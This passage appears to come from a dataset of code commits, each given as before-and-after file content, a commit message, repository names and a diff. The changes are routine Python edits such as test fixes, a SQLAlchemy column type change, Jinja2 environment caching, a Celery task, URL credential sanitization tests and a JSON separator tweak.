svg.addCostume("assets/SVG Logo.svg", "svg")
svg.costumeNumber = 1
svg.scale = 1
svg.showBoundingBox = False
svg.goto(100, 300)
svg2 = slither.Sprite()
svg2.addCostume("assets/SVG Logo.svg", "svg")
svg2.costumeNumber = 1
svg2.scale = 5
svg2.showBoundingBox = False
svg2.goto(500, 300)
slither.setup() # Begin slither
def run_a_frame():
pass
slither.runMainLoop(run_a_frame)
|
Fix test to work on Linux
|
Fix test to work on Linux
|
Python
|
mit
|
PySlither/Slither,PySlither/Slither
|
---
+++
@@ -9,14 +9,14 @@
print("No SVGs today :(")
svg = slither.Sprite()
-svg.addCostume("assets/svg Logo.svg", "svg")
+svg.addCostume("assets/SVG Logo.svg", "svg")
svg.costumeNumber = 1
svg.scale = 1
svg.showBoundingBox = False
svg.goto(100, 300)
svg2 = slither.Sprite()
-svg2.addCostume("assets/svg Logo.svg", "svg")
+svg2.addCostume("assets/SVG Logo.svg", "svg")
svg2.costumeNumber = 1
svg2.scale = 5
svg2.showBoundingBox = False
|
20f4a6ee8421a9827ff04f0fc3b065377775b860
|
test/single_test.py
|
test/single_test.py
|
import sys
import unittest
from unittest import TestSuite
def suite(test_name):
suite = unittest.TestSuite()
suite.addTest(unittest.defaultTestLoader.loadTestsFromName(test_name))
return suite
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage {test_name}")
sys.exit(1)
runner = unittest.TextTestRunner()
runner.run(suite(sys.argv[1]))
|
import sys
import unittest
from unittest import TestSuite
def suite(test_name):
suite = unittest.TestSuite()
suite.addTest(unittest.defaultTestLoader.loadTestsFromName(test_name))
return suite
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage {test_name}")
sys.exit(1)
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite(sys.argv[1]))
|
Change single test verbosity to 2
|
Change single test verbosity to 2
|
Python
|
mit
|
JakubPetriska/poker-cfr,JakubPetriska/poker-cfr
|
---
+++
@@ -14,5 +14,5 @@
print("Usage {test_name}")
sys.exit(1)
- runner = unittest.TextTestRunner()
+ runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite(sys.argv[1]))
|
e5fdd60d9134bdb2e234b3eaffa2812c5ac288c9
|
tests/core_tests.py
|
tests/core_tests.py
|
# -*- coding: utf-8 -*-
import datetime
from openfisca_tunisia import TunisiaTaxBenefitSystem
from openfisca_tunisia.scenarios import init_single_entity
tax_benefit_system = TunisiaTaxBenefitSystem()
def check_1_parent(year = 2011):
scenario = init_single_entity(
tax_benefit_system.new_scenario(),
axes = [dict(
count = 3,
name = 'salaire_imposable',
max = 100000,
min = 0,
)],
period = year,
parent1 = dict(date_naissance = datetime.date(year - 40, 1, 1)),
)
simulation = scenario.new_simulation()
revenu_disponible = simulation.calculate('revenu_disponible', period = year)
def test_1_parent():
for year in range(2009, 2011):
yield check_1_parent, year
if __name__ == '__main__':
import logging
import sys
logging.basicConfig(level = logging.ERROR, stream = sys.stdout)
test_1_parent()
# test_1_parent_2_enfants()
# test_1_parent_2_enfants_1_column()
|
# -*- coding: utf-8 -*-
import datetime
from openfisca_tunisia import TunisiaTaxBenefitSystem
from openfisca_tunisia.scenarios import init_single_entity
tax_benefit_system = TunisiaTaxBenefitSystem()
def check_1_parent(year = 2011):
scenario = init_single_entity(
tax_benefit_system.new_scenario(),
axes = [[
dict(
count = 3,
name = 'salaire_imposable',
max = 100000,
min = 0,
)
]],
period = year,
parent1 = dict(date_naissance = datetime.date(year - 40, 1, 1)),
)
simulation = scenario.new_simulation()
revenu_disponible = simulation.calculate('revenu_disponible', period = year)
def test_1_parent():
for year in range(2009, 2011):
yield check_1_parent, year
if __name__ == '__main__':
import logging
import sys
logging.basicConfig(level = logging.ERROR, stream = sys.stdout)
test_1_parent()
# test_1_parent_2_enfants()
# test_1_parent_2_enfants_1_column()
|
Fix KeyError on test with axis
|
Fix KeyError on test with axis
|
Python
|
agpl-3.0
|
openfisca/openfisca-tunisia,openfisca/openfisca-tunisia
|
---
+++
@@ -13,12 +13,14 @@
def check_1_parent(year = 2011):
scenario = init_single_entity(
tax_benefit_system.new_scenario(),
- axes = [dict(
- count = 3,
- name = 'salaire_imposable',
- max = 100000,
- min = 0,
- )],
+ axes = [[
+ dict(
+ count = 3,
+ name = 'salaire_imposable',
+ max = 100000,
+ min = 0,
+ )
+ ]],
period = year,
parent1 = dict(date_naissance = datetime.date(year - 40, 1, 1)),
)
|
bb007f6a2c0563d9fb908fae98b0e950af936810
|
uchan/lib/models/post.py
|
uchan/lib/models/post.py
|
from sqlalchemy import Column, Integer, String, BigInteger, ForeignKey
from sqlalchemy.orm import relationship
from uchan.database import ModelBase
class Post(ModelBase):
__tablename__ = 'post'
id = Column(Integer(), primary_key=True)
thread_id = Column(Integer(), ForeignKey('thread.id'), nullable=False, index=True)
# thread is a backref property
report = relationship('Report', backref='post', cascade='all, delete-orphan')
file = relationship('File', backref='post', uselist=False, lazy='joined', cascade='all, delete-orphan')
date = Column(BigInteger(), nullable=False, index=True)
name = Column(String())
subject = Column(String())
text = Column(String(), index=True)
refno = Column(Integer(), nullable=False, index=True)
password = Column(String())
ip4 = Column(Integer(), nullable=False, index=True)
|
from sqlalchemy import Column, Integer, String, BigInteger, ForeignKey
from sqlalchemy.orm import relationship
from uchan.database import ModelBase
class Post(ModelBase):
__tablename__ = 'post'
id = Column(Integer(), primary_key=True)
thread_id = Column(Integer(), ForeignKey('thread.id'), nullable=False, index=True)
# thread is a backref property
report = relationship('Report', backref='post', cascade='all, delete-orphan')
file = relationship('File', backref='post', uselist=False, lazy='joined', cascade='all, delete-orphan')
date = Column(BigInteger(), nullable=False, index=True)
name = Column(String())
subject = Column(String())
text = Column(String(), index=True)
refno = Column(Integer(), nullable=False, index=True)
password = Column(String())
ip4 = Column(BigInteger(), nullable=False, index=True)
|
Use bigint for ip4, fits addresses bigger dan 2^31
|
Use bigint for ip4, fits addresses bigger dan 2^31
|
Python
|
mit
|
Floens/uchan,Floens/uchan,Floens/uchan,Floens/uchan,Floens/uchan
|
---
+++
@@ -22,4 +22,4 @@
text = Column(String(), index=True)
refno = Column(Integer(), nullable=False, index=True)
password = Column(String())
- ip4 = Column(Integer(), nullable=False, index=True)
+ ip4 = Column(BigInteger(), nullable=False, index=True)
|
0c91b7546dcf770c5c1f90bb41ad2de1998a62bb
|
lib/stango/shortcuts.py
|
lib/stango/shortcuts.py
|
import os
def render_template(template_name, **kwargs):
from jinja2 import Environment, FileSystemLoader
env = Environment(loader=FileSystemLoader('templates'))
tmpl = env.get_template(template_name)
return tmpl.render(**kwargs)
|
import os
_env = None
def render_template(template_name, **kwargs):
from jinja2 import Environment, FileSystemLoader
global _env
if _env is None:
_env = Environment(loader=FileSystemLoader('templates'))
tmpl = _env.get_template(template_name)
return tmpl.render(**kwargs)
|
Use global Jinja2 environment in render_template
|
Use global Jinja2 environment in render_template
Before this patch, a new environment was created in every call of
render_template().
|
Python
|
mit
|
akheron/stango
|
---
+++
@@ -1,9 +1,12 @@
import os
+_env = None
def render_template(template_name, **kwargs):
from jinja2 import Environment, FileSystemLoader
+ global _env
- env = Environment(loader=FileSystemLoader('templates'))
- tmpl = env.get_template(template_name)
+ if _env is None:
+ _env = Environment(loader=FileSystemLoader('templates'))
+ tmpl = _env.get_template(template_name)
return tmpl.render(**kwargs)
|
eb47f234b865fb3ffc0d91c44ba114a73423595e
|
analyser/tasks.py
|
analyser/tasks.py
|
import os
import time
import rethinkdb as r
import requests
from krunchr.vendors.celery import celery, db
@celery.task(bind=True)
def get_file(self, url, path):
name, ext = os.path.splitext(url)
name = str(int(time.time()))
path = "%s/%s%s" % (path, name, ext)
response = requests.get(url)
with open(path, 'w') as f:
f.write(response.content)
r.table('jobs').filter({
'task_id': self.request.id
}).update({'state': 'done'}).run(db)
|
import os
import time
from shutil import copy2
from subprocess import Popen, PIPE
import rethinkdb as r
import requests
from krunchr.vendors.celery import celery, db, config
@celery.task(bind=True)
def get_file(self, url, path):
name, ext = os.path.splitext(url)
name = str(int(time.time()))
path = "%s/%s%s" % (path, name, ext)
response = requests.get(url)
with open(path, 'w') as f:
f.write(response.content)
r.table('jobs').filter({
'task_id': self.request.id
}).update({'state': 'done'}).run(db)
return path
@celery.task(bind=True)
def push_data(self, path):
filename = os.path.basename(path)
tmp_dir = str(int(time.time()))
os.chdir(config.DISCO_FILES)
os.makedirs(tmp_dir)
copy2(filename, "%s/%s" % (tmp_dir, filename))
os.chdir(tmp_dir)
split_process = Popen(['split', '-n', config.DISCO_NODES, path],
stdout=PIPE)
print split_process.communicate()
|
Create a task for data pushing
|
Create a task for data pushing
|
Python
|
apache-2.0
|
vtemian/kruncher
|
---
+++
@@ -1,10 +1,12 @@
import os
import time
+from shutil import copy2
+from subprocess import Popen, PIPE
import rethinkdb as r
import requests
-from krunchr.vendors.celery import celery, db
+from krunchr.vendors.celery import celery, db, config
@celery.task(bind=True)
@@ -21,3 +23,20 @@
r.table('jobs').filter({
'task_id': self.request.id
}).update({'state': 'done'}).run(db)
+
+ return path
+
+
+@celery.task(bind=True)
+def push_data(self, path):
+ filename = os.path.basename(path)
+ tmp_dir = str(int(time.time()))
+
+ os.chdir(config.DISCO_FILES)
+ os.makedirs(tmp_dir)
+ copy2(filename, "%s/%s" % (tmp_dir, filename))
+ os.chdir(tmp_dir)
+
+ split_process = Popen(['split', '-n', config.DISCO_NODES, path],
+ stdout=PIPE)
+ print split_process.communicate()
|
13f8d069f63b9bb22a268a27daae1434587807fc
|
competencies/tests/test_fork_schools.py
|
competencies/tests/test_fork_schools.py
|
from django.test import TestCase
from competencies.models import *
import testing_utilities as tu
class TestForkSchools(TestCase):
def setUp(self):
# Create a school.
self.school_0 = tu.create_school(name="School 0")
def test_fork_school(self):
# Make a new school, and fork school_o's system.
pass
def test_fork_school_from_view(self):
# Do the same thing as test_fork_school, but through
# view interface.
pass
|
from django.test import TestCase
from competencies.models import *
import testing_utilities as tu
class TestForkSchools(TestCase):
def setUp(self):
num_schools = 3
num_subject_areas = 5
# Create some schools.
self.schools = []
for school_num in range(0, num_schools):
school_name = "School %d" % school_num
self.schools.append(tu.create_school(name=school_name))
# Create some subject areas.
for school in self.schools:
for sa_num in range(0, num_subject_areas):
subject_area = "Subject %d" % sa_num
tu.create_subject_area(subject_area, school)
#self.show_schools()
def show_schools(self):
for school in self.schools:
print("\nSchool: %s" % school.name)
for subject_area in SubjectArea.objects.filter(school=school):
print("Subject area: %s" % subject_area)
def test_fork_school(self):
# Make a new school, and fork school_0's system.
pass
def test_fork_school_from_view(self):
# Do the same thing as test_fork_school, but through
# view interface.
pass
|
Test builds a number of schools, each of which has a number of subject areas.
|
Test builds a number of schools, each of which has a number of subject areas.
|
Python
|
mit
|
openlearningtools/opencompetencies,openlearningtools/opencompetencies
|
---
+++
@@ -6,11 +6,34 @@
class TestForkSchools(TestCase):
def setUp(self):
- # Create a school.
- self.school_0 = tu.create_school(name="School 0")
+ num_schools = 3
+ num_subject_areas = 5
+
+ # Create some schools.
+ self.schools = []
+ for school_num in range(0, num_schools):
+ school_name = "School %d" % school_num
+ self.schools.append(tu.create_school(name=school_name))
+
+ # Create some subject areas.
+ for school in self.schools:
+ for sa_num in range(0, num_subject_areas):
+ subject_area = "Subject %d" % sa_num
+ tu.create_subject_area(subject_area, school)
+
+ #self.show_schools()
+
+
+ def show_schools(self):
+
+ for school in self.schools:
+ print("\nSchool: %s" % school.name)
+ for subject_area in SubjectArea.objects.filter(school=school):
+ print("Subject area: %s" % subject_area)
+
def test_fork_school(self):
- # Make a new school, and fork school_o's system.
+ # Make a new school, and fork school_0's system.
pass
def test_fork_school_from_view(self):
|
9f6b12b2579f228fd9d04151771a22474a2744a3
|
tabula/wrapper.py
|
tabula/wrapper.py
|
import subprocess, io, shlex, os
import pandas as pd
def read_pdf_table(input_path, options=""):
jar_path = os.path.abspath(os.path.dirname(__file__))
JAR_NAME = "tabula-0.9.1-jar-with-dependencies.jar"
args = ["java", "-jar"] + [jar_path + "/" + JAR_NAME] + shlex.split(options) + [input_path]
result = subprocess.run(args, stdout=subprocess.PIPE)
if len(result.stdout) == 0:
return
return pd.read_csv(io.BytesIO(result.stdout))
|
import subprocess, io, shlex, os
import pandas as pd
def read_pdf_table(input_path, options=""):
JAR_NAME = "tabula-0.9.1-jar-with-dependencies.jar"
jar_dir = os.path.abspath(os.path.dirname(__file__))
jar_path = os.path.join(jar_dir, JAR_NAME)
args = ["java", "-jar", jar_path] + shlex.split(options) + [input_path]
result = subprocess.run(args, stdout=subprocess.PIPE)
if len(result.stdout) == 0:
return
return pd.read_csv(io.BytesIO(result.stdout))
|
Use os.path.join for Jar path to make it OS independent
|
Use os.path.join for Jar path to make it OS independent
|
Python
|
mit
|
chezou/tabula-py
|
---
+++
@@ -2,9 +2,10 @@
import pandas as pd
def read_pdf_table(input_path, options=""):
- jar_path = os.path.abspath(os.path.dirname(__file__))
JAR_NAME = "tabula-0.9.1-jar-with-dependencies.jar"
- args = ["java", "-jar"] + [jar_path + "/" + JAR_NAME] + shlex.split(options) + [input_path]
+ jar_dir = os.path.abspath(os.path.dirname(__file__))
+ jar_path = os.path.join(jar_dir, JAR_NAME)
+ args = ["java", "-jar", jar_path] + shlex.split(options) + [input_path]
result = subprocess.run(args, stdout=subprocess.PIPE)
|
77e237ce2d95e28c9b4ac7b5716131b3da268aec
|
tests/test_qiniu.py
|
tests/test_qiniu.py
|
import os
from os.path import dirname, join
import uuid
import qiniu.conf
import qiniu.io
import qiniu.rs
import qiniu.rsf
QINIU_ACCESS_KEY = os.environ.get('QINIU_ACCESS_KEY')
QINIU_SECRET_KEY = os.environ.get('QINIU_SECRET_KEY')
QINIU_BUCKET_NAME = os.environ.get('QINIU_BUCKET_NAME')
QINIU_BUCKET_DOMAIN = os.environ.get('QINIU_BUCKET_DOMAIN')
qiniu.conf.ACCESS_KEY = QINIU_ACCESS_KEY
qiniu.conf.SECRET_KEY = QINIU_SECRET_KEY
QINIU_PUT_POLICY= qiniu.rs.PutPolicy(QINIU_BUCKET_NAME)
def test_put_file():
ASSET_FILE_NAME = 'bootstrap.min.css'
with open(join(dirname(__file__),'assets', ASSET_FILE_NAME), 'rb') as assset_file:
text = assset_file.read()
print "Test text: %s" % text
token = QINIU_PUT_POLICY.token()
ret, err = qiniu.io.put(token, join(str(uuid.uuid4()), ASSET_FILE_NAME), text)
if err:
raise IOError(
"Error message: %s" % err)
|
import os
from os.path import dirname, join
import uuid
import qiniu.conf
import qiniu.io
import qiniu.rs
import qiniu.rsf
QINIU_ACCESS_KEY = os.environ.get('QINIU_ACCESS_KEY')
QINIU_SECRET_KEY = os.environ.get('QINIU_SECRET_KEY')
QINIU_BUCKET_NAME = os.environ.get('QINIU_BUCKET_NAME')
QINIU_BUCKET_DOMAIN = os.environ.get('QINIU_BUCKET_DOMAIN')
qiniu.conf.ACCESS_KEY = QINIU_ACCESS_KEY
qiniu.conf.SECRET_KEY = QINIU_SECRET_KEY
QINIU_PUT_POLICY= qiniu.rs.PutPolicy(QINIU_BUCKET_NAME)
def test_put_file():
ASSET_FILE_NAME = 'jquery-1.11.1.min.js'
with open(join(dirname(__file__),'assets', ASSET_FILE_NAME), 'rb') as assset_file:
text = assset_file.read()
print "Test text: %s" % text
token = QINIU_PUT_POLICY.token()
ret, err = qiniu.io.put(token, join(str(uuid.uuid4()), ASSET_FILE_NAME), text)
if err:
raise IOError(
"Error message: %s" % err)
|
Test upload with a small file
|
Test upload with a small file
|
Python
|
mit
|
jeffrey4l/django-qiniu-storage,jackeyGao/django-qiniu-storage,Mark-Shine/django-qiniu-storage,glasslion/django-qiniu-storage
|
---
+++
@@ -19,7 +19,7 @@
QINIU_PUT_POLICY= qiniu.rs.PutPolicy(QINIU_BUCKET_NAME)
def test_put_file():
- ASSET_FILE_NAME = 'bootstrap.min.css'
+ ASSET_FILE_NAME = 'jquery-1.11.1.min.js'
with open(join(dirname(__file__),'assets', ASSET_FILE_NAME), 'rb') as assset_file:
text = assset_file.read()
|
18808b6594d7e2b1c81a2cf4351708e179fb29bb
|
tests/test_utils.py
|
tests/test_utils.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from badwolf.utils import sanitize_sensitive_data
def test_sanitize_basic_auth_urls():
text = 'abc http://user:pwd@example.com def'
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://***:***@example.com' in sanitized
text = '''abc
http://user:pwd@example.com
def
'''
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://***:***@example.com' in sanitized
text = '''abc
http://example.com
-e git+https://user:pwd@example.com/
def
'''
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://example.com' in sanitized
assert 'git+https://***:***@example.com' in sanitized
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from badwolf.utils import sanitize_sensitive_data
def test_sanitize_basic_auth_urls():
text = 'abc http://user:pwd@example.com def'
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://***:***@example.com' in sanitized
text = '''abc
http://user:pwd@example.com
def
'''
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://***:***@example.com' in sanitized
text = '''abc
http://example.com
-e git+https://user:pwd@example.com/
def
'''
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://example.com' in sanitized
assert 'git+https://***:***@example.com' in sanitized
lots_of_urls = ['-e git+https://user:pwd@example.com abcd'] * 1000
lots_of_urls.extend(['abc http://example.com def'] * 1000)
text = '\n'.join(lots_of_urls)
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://example.com' in sanitized
assert 'git+https://***:***@example.com' in sanitized
|
Update test case for sanitize_sensitive_data
|
Update test case for sanitize_sensitive_data
|
Python
|
mit
|
bosondata/badwolf,bosondata/badwolf,bosondata/badwolf
|
---
+++
@@ -32,3 +32,12 @@
assert 'pwd' not in sanitized
assert 'http://example.com' in sanitized
assert 'git+https://***:***@example.com' in sanitized
+
+ lots_of_urls = ['-e git+https://user:pwd@example.com abcd'] * 1000
+ lots_of_urls.extend(['abc http://example.com def'] * 1000)
+ text = '\n'.join(lots_of_urls)
+ sanitized = sanitize_sensitive_data(text)
+ assert 'user' not in sanitized
+ assert 'pwd' not in sanitized
+ assert 'http://example.com' in sanitized
+ assert 'git+https://***:***@example.com' in sanitized
|
db45239e050e6699a2c49fe4156b100c42481c9f
|
wsme/tests/test_spore.py
|
wsme/tests/test_spore.py
|
import unittest
try:
import simplejson as json
except ImportError:
import json
from wsme.tests.protocol import WSTestRoot
import wsme.tests.test_restjson
import wsme.spore
class TestSpore(unittest.TestCase):
def test_spore(self):
spore = wsme.spore.getdesc(WSTestRoot())
print(spore)
spore = json.loads(spore)
assert len(spore['methods']) == 40, str(len(spore['methods']))
m = spore['methods']['argtypes_setbytesarray']
assert m['path'] == '/argtypes/setbytesarray'
assert m['optional_params'] == ['value']
assert m['method'] == 'POST'
m = spore['methods']['argtypes_setdecimal']
assert m['path'] == '/argtypes/setdecimal'
assert m['required_params'] == ['value']
assert m['method'] == 'GET'
|
import unittest
try:
import simplejson as json
except ImportError:
import json
from wsme.tests.protocol import WSTestRoot
import wsme.tests.test_restjson
import wsme.spore
class TestSpore(unittest.TestCase):
def test_spore(self):
spore = wsme.spore.getdesc(WSTestRoot())
print(spore)
spore = json.loads(spore)
assert len(spore['methods']) == 40, str(len(spore['methods']))
m = spore['methods']['argtypes_setbytesarray']
assert m['path'] == '/argtypes/setbytesarray'
assert m['optional_params'] == ['value']
assert m['method'] == 'POST'
m = spore['methods']['argtypes_setdecimal']
assert m['path'] == '/argtypes/setdecimal'
assert m['required_params'] == ['value']
assert m['method'] == 'GET'
m = spore['methods']['crud_create']
assert m['path'] == '/crud'
assert m['method'] == 'PUT'
assert m['optional_params'] == ['data']
m = spore['methods']['crud_read']
assert m['path'] == '/crud'
assert m['method'] == 'GET'
assert m['required_params'] == ['ref']
m = spore['methods']['crud_update']
assert m['path'] == '/crud'
assert m['method'] == 'POST'
assert m['optional_params'] == ['data']
m = spore['methods']['crud_delete']
assert m['path'] == '/crud'
assert m['method'] == 'DELETE'
assert m['optional_params'] == ['ref']
|
Test SPORE crud function descriptions
|
Test SPORE crud function descriptions
|
Python
|
mit
|
stackforge/wsme
|
---
+++
@@ -29,3 +29,23 @@
assert m['path'] == '/argtypes/setdecimal'
assert m['required_params'] == ['value']
assert m['method'] == 'GET'
+
+ m = spore['methods']['crud_create']
+ assert m['path'] == '/crud'
+ assert m['method'] == 'PUT'
+ assert m['optional_params'] == ['data']
+
+ m = spore['methods']['crud_read']
+ assert m['path'] == '/crud'
+ assert m['method'] == 'GET'
+ assert m['required_params'] == ['ref']
+
+ m = spore['methods']['crud_update']
+ assert m['path'] == '/crud'
+ assert m['method'] == 'POST'
+ assert m['optional_params'] == ['data']
+
+ m = spore['methods']['crud_delete']
+ assert m['path'] == '/crud'
+ assert m['method'] == 'DELETE'
+ assert m['optional_params'] == ['ref']
|
55c16e409d2919d0a32f7fce24c01059576ce867
|
linked_accounts/backends.py
|
linked_accounts/backends.py
|
from django.contrib.auth.models import User
from linked_accounts.handlers import AuthHandler
from oauth_flow.handlers import OAuth20Token
class LinkedAccountsBackend(object):
supports_object_permissions = False
supports_anonymous_user = False
supports_inactive_user = False
def get_user(self, user_id):
return User.objects.get(id=user_id)
def authenticate(self, service=None, token=None, expires=None):
if isinstance(token, basestring):
token = OAuth20Token(token, expires)
handler = AuthHandler.get_handler(service)
return handler.get_profile(token)
|
from django.contrib.auth.models import User
from linked_accounts.handlers import AuthHandler
from oauth_flow.handlers import OAuth20Token
class LinkedAccountsBackend(object):
supports_object_permissions = False
supports_anonymous_user = False
supports_inactive_user = False
def get_user(self, user_id):
return User.objects.get(id=user_id)
def authenticate(self, service=None, token=None, expires=None):
if isinstance(token, basestring) and service in ['facebook', 'google']:
token = OAuth20Token(token, expires)
handler = AuthHandler.get_handler(service)
return handler.get_profile(token)
|
Use OAuth20Token only for facebook, google
|
Use OAuth20Token only for facebook, google
|
Python
|
mit
|
zen4ever/django-linked-accounts,zen4ever/django-linked-accounts
|
---
+++
@@ -15,7 +15,7 @@
return User.objects.get(id=user_id)
def authenticate(self, service=None, token=None, expires=None):
- if isinstance(token, basestring):
+ if isinstance(token, basestring) and service in ['facebook', 'google']:
token = OAuth20Token(token, expires)
handler = AuthHandler.get_handler(service)
return handler.get_profile(token)
|
10e26b52f94bb1a6345d2c1540a0a09a82b7831c
|
baseflask/refresh_varsnap.py
|
baseflask/refresh_varsnap.py
|
"""
This script refreshes production varsnap snaps
"""
import os
from syspath import git_root # NOQA
from app import serve
os.environ['ENV'] = 'production'
app = serve.app.test_client()
app.get('/')
app.get('/health')
app.get('/robots.txt')
app.get('/asdf')
|
"""
This script refreshes production varsnap snaps
"""
import os
from syspath import git_root # NOQA
from app import serve
os.environ['ENV'] = 'production'
app = serve.app.test_client()
app.get('/')
app.get('/health')
app.get('/humans.txt')
app.get('/robots.txt')
app.get('/.well-known/security.txt')
app.get('/asdf')
|
Update varsnap refresh with new endpoints
|
Update varsnap refresh with new endpoints
|
Python
|
mit
|
albertyw/base-flask,albertyw/base-flask,albertyw/base-flask,albertyw/base-flask
|
---
+++
@@ -13,5 +13,7 @@
app = serve.app.test_client()
app.get('/')
app.get('/health')
+app.get('/humans.txt')
app.get('/robots.txt')
+app.get('/.well-known/security.txt')
app.get('/asdf')
|
79fb90779e5d85978cdb7dbb36f51baa96190f77
|
bci/__init__.py
|
bci/__init__.py
|
from fakebci import FakeBCI
|
import os
import sys
import platform
import shutil
import inspect
#
#def machine():
# """Return type of machine."""
# if os.name == 'nt' and sys.version_info[:2] < (2,7):
# return os.environ.get("PROCESSOR_ARCHITEW6432",
# os.environ.get('PROCESSOR_ARCHITECTURE', ''))
# else:
# return platform.machine()
#
#def arch(machine=machine()):
# """Return bitness of operating system, or None if unknown."""
# machine2bits = {'AMD64': 64, 'x86_64': 64, 'i386': 32, 'x86': 32}
# return machine2bits.get(machine, None)
#
#print (os_bits())
from fakebci import *
def create_so():
base_dir = os.path.dirname(inspect.getabsfile(FakeBCI))
boosted_bci = os.path.join(base_dir, 'boosted_bci.so')
if not os.path.exists(boosted_bci):
if sys.platform == 'darwin':
if platform.architecture()[0] == '64bit':
shutil.copyfile(os.path.join(base_dir, 'boosted_bci_darwin_x86_64.so'), boosted_bci)
else:
raise NotImplementedError("32 bit OS X is currently untested")
try:
from boosted_bci import greet
except:
print "Platform specific bci files have not been created"
|
Make some changes to the bci package file.
|
Make some changes to the bci package file.
|
Python
|
bsd-3-clause
|
NeuralProsthesisLab/unlock,NeuralProsthesisLab/unlock,NeuralProsthesisLab/unlock,NeuralProsthesisLab/unlock,NeuralProsthesisLab/unlock,NeuralProsthesisLab/unlock,NeuralProsthesisLab/unlock
|
---
+++
@@ -1 +1,38 @@
-from fakebci import FakeBCI
+import os
+import sys
+import platform
+import shutil
+import inspect
+
+#
+#def machine():
+# """Return type of machine."""
+# if os.name == 'nt' and sys.version_info[:2] < (2,7):
+# return os.environ.get("PROCESSOR_ARCHITEW6432",
+# os.environ.get('PROCESSOR_ARCHITECTURE', ''))
+# else:
+# return platform.machine()
+#
+#def arch(machine=machine()):
+# """Return bitness of operating system, or None if unknown."""
+# machine2bits = {'AMD64': 64, 'x86_64': 64, 'i386': 32, 'x86': 32}
+# return machine2bits.get(machine, None)
+#
+#print (os_bits())
+
+from fakebci import *
+
+def create_so():
+ base_dir = os.path.dirname(inspect.getabsfile(FakeBCI))
+ boosted_bci = os.path.join(base_dir, 'boosted_bci.so')
+ if not os.path.exists(boosted_bci):
+ if sys.platform == 'darwin':
+ if platform.architecture()[0] == '64bit':
+ shutil.copyfile(os.path.join(base_dir, 'boosted_bci_darwin_x86_64.so'), boosted_bci)
+ else:
+ raise NotImplementedError("32 bit OS X is currently untested")
+
+try:
+ from boosted_bci import greet
+except:
+ print "Platform specific bci files have not been created"
|
caddef7500241135965e6d91ca94a38224bfd0cd
|
ui2/path_helpers.py
|
ui2/path_helpers.py
|
import ui
def get_path_image(path):
""" Get an image of a path """
bounds = path.bounds
with ui.ImageContext(bounds.max_x, bounds.max_y) as ctx:
path.fill()
return ctx.get_image()
def copy_path(path):
""" Make a copy of a ui.Path and return it. Preserves all data. """
new = ui.Path()
new.append_path(path)
# Copy over the attributes
new.line_cap_style = path.line_cap_style
new.line_join_style = path.line_join_style
new.line_width = path.line_width
return new
|
import ui
import objc_util
def get_path_image(path):
""" Get an image of a path """
bounds = path.bounds
with ui.ImageContext(bounds.max_x, bounds.max_y) as ctx:
path.fill()
return ctx.get_image()
def copy_path(path):
""" Make a copy of a ui.Path and return it. Preserves all data. """
new = ui.Path()
new.append_path(path)
# Copy over the attributes
new.line_cap_style = path.line_cap_style
new.line_join_style = path.line_join_style
new.line_width = path.line_width
return new
def scale_path(path, scale):
""" Stretch or scale a path. Pass either a scale or a tuple of scales """
if not hasattr(scale, "__iter__"):
scale = (scale, scale)
sx, sy = scale
newpath = copy_path(path)
# Construct an affine transformation matrix
transform = objc_util.CGAffineTransform(sx, 0, 0, sy, 0, 0)
# Apply it to the path
objcpath = objc_util.ObjCInstance(newpath)
objcpath.applyTransform_(transform)
return newpath
|
Add method for scaling path
|
Add method for scaling path
|
Python
|
mit
|
controversial/ui2
|
---
+++
@@ -1,4 +1,5 @@
import ui
+import objc_util
def get_path_image(path):
@@ -19,3 +20,18 @@
new.line_width = path.line_width
return new
+
+
+def scale_path(path, scale):
+ """ Stretch or scale a path. Pass either a scale or a tuple of scales """
+ if not hasattr(scale, "__iter__"):
+ scale = (scale, scale)
+ sx, sy = scale
+
+ newpath = copy_path(path)
+ # Construct an affine transformation matrix
+ transform = objc_util.CGAffineTransform(sx, 0, 0, sy, 0, 0)
+ # Apply it to the path
+ objcpath = objc_util.ObjCInstance(newpath)
+ objcpath.applyTransform_(transform)
+ return newpath
|
e3604b5f0cdae3889cfe7531f7a5b9d1c09f56bd
|
PrettyJson.py
|
PrettyJson.py
|
import sublime
import sublime_plugin
import json
s = sublime.load_settings("Pretty JSON.sublime-settings")
class PrettyjsonCommand(sublime_plugin.TextCommand):
""" Pretty Print JSON
"""
def run(self, edit):
for region in self.view.sel():
# If no selection, use the entire file as the selection
if region.empty() and s.get("use_entire_file_if_no_selection"):
selection = sublime.Region(0, self.view.size())
else:
selection = region
try:
obj = json.loads(self.view.substr(selection))
self.view.replace(edit, selection, json.dumps(obj, indent=s.get("indent_size", 4), ensure_ascii=False, sort_keys=s.get("sort_keys", True)))
except Exception, e:
sublime.status_message(str(e))
|
import sublime
import sublime_plugin
import json
s = sublime.load_settings("Pretty JSON.sublime-settings")
class PrettyjsonCommand(sublime_plugin.TextCommand):
""" Pretty Print JSON
"""
def run(self, edit):
for region in self.view.sel():
# If no selection, use the entire file as the selection
if region.empty() and s.get("use_entire_file_if_no_selection"):
selection = sublime.Region(0, self.view.size())
else:
selection = region
try:
obj = json.loads(self.view.substr(selection))
self.view.replace(edit, selection, json.dumps(obj, indent=s.get("indent_size", 4), ensure_ascii=False, sort_keys=s.get("sort_keys", True), separators=(',', ': ')))
except Exception, e:
sublime.status_message(str(e))
|
Configure json.dumps() to use an item separator of "," instead of the default ", " to prevent single whitespace at the end of lines.
|
Configure json.dumps() to use an item separator of "," instead of the default ", " to prevent single whitespace at the end of lines.
Without this option, all prettyfied JSON has one space at the end of each line, which is not so pretty:
{
"key": "value",_
